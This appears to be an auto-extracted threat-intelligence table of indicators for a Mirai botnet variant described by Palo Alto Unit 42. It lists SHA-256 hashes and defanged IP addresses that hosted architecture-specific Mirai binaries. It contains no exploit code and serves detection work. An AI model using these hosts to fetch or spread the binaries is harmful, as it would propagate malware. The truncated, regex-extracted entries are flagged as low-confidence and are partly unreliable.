| sha256 | 0bbdb062ecfae7e1b59084a5e5fe052908ecfdea7db0777a9c318e9e55fdb5ff | 7d871 Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.ppc 0bbdb062ecfae7e1b59084a5e5fe052908ecfdea7db0777a9c318e9e55fdb5ff Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.sh4 77a1f | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 0c4ec06f32d5f15846239d224d68086cbeaf513b63f0fcafa4eddd8e18a3d372 | ea04b Mar 11, 2021 12:59 UTC 203[.]159.80.241/bins/dark.ppc 0c4ec06f32d5f15846239d224d68086cbeaf513b63f0fcafa4eddd8e18a3d372 Mar 11, 2021 12:30 UTC 203[.]159.80.241/bins/dark.sh4 2f590 | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 1d9496814d35d9e302d7e99339e9730fc81c022bc085c0711b73ebad962cbc2b | 2f4420a Mar 3, 2021 14:24 UTC 45[.]133.1.133/bins/dark.mpsl 1d9496814d35d9e302d7e99339e9730fc81c022bc085c0711b73ebad962cbc2b Mar 3, 2021 14:24 UTC 45[.]133.1.133/bins/dark.ppc 971b5a96 | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 1e56f8ca44f84eff212805fa061ecb0f6fb8bc9499ff2e541ad3c43fb2f4420a | 54d23ba Mar 3, 2021 14:24 UTC 45[.]133.1.133/bins/dark.mips 1e56f8ca44f84eff212805fa061ecb0f6fb8bc9499ff2e541ad3c43fb2f4420a Mar 3, 2021 14:24 UTC 45[.]133.1.133/bins/dark.mpsl 1d94968 | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.